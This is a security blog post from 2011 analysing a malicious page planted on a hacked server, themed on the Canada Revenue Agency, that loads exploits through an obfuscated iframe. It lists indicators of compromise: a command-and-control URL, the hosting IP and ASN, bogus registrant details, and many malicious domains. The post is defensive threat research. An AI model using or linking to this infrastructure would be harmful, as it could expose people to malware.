The Latest in IT Security

An ant-hill full of bots

15
Jun
2011

I found a malicious page placed on a hacked server:

CRA stands for Canada Revenue Agency, as you can see in the page’s source code below:

The meta tag redirects to the Canada Revenue Agency’s website after a few seconds:

But what is the rest of the obfuscated code?

Here is the deobfuscated version (courtesy of Wepawet):

Now we know more about the intent behind this cra.html page. The URL the iframe points to will load multiple exploits:

I noticed that Google Chrome warned me prior to running the script (which I did anyway for testing purposes):

This is a pretty cool feature that can prevent many infections. Thanks Google :-)

Following a successful installation, the malware will call 212.150.164.206/email/gate.php at regular intervals and send data in what looks like a custom obfuscation form:

Let’s check out the malicious domain: somerandomiframedomain.com

IP: 92.38.232.92
Location: Moscow, Russia
ASN: AS12695 (DINET-AS Digital Network JSC)
Registrar: BIZCN.COM, INC.

Registrant information is bogus (of course):
Ricardo GALENO @austin.co.com
9999999999 fax: 9999999999
1928 BURTON DR 157
Savannah TX 78741
us

Other domain names on that server include:
aecdmkk.cz.cc
analyticgoogle.net
boleslaw.ru
borsteodor.com
facebook-hot.com
facebook-top.com
fbfbvfbfbrgrgr.cz.cc
fruittrust.com
greatkelly.com
iglgxib.cz.cc
lsospawwdfg.cz.cc
nogavitu.net
proderton.com
qpofuyfjhask.cz.cc
tarabona.cz.cc
tha-facebook.com
uasifyufttgas.cz.cc
upsclients.org
upstrack.org
varealestateblog.com
vbnbvhyftdgd.cz.cc
wowldskuydg.cz.cc
yxrenhe.cz.cc

This ASN is deeply involved in allowing CnC servers and other bot related activities:

abuse.ch:

Google Safe Bowsing
malc0de.com

At this moment, I am not sure what the connection (if any) between the malware and the Canadian Revenue Agency is.

Here are a couple of VirusTotal reports from some of the binaries that were dropped. VT1, VT2.

Jerome Segura

Leave a reply


Categories

FRIDAY, MARCH 29, 2024
WHITE PAPERS

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...

Featured

Archives

Latest Comments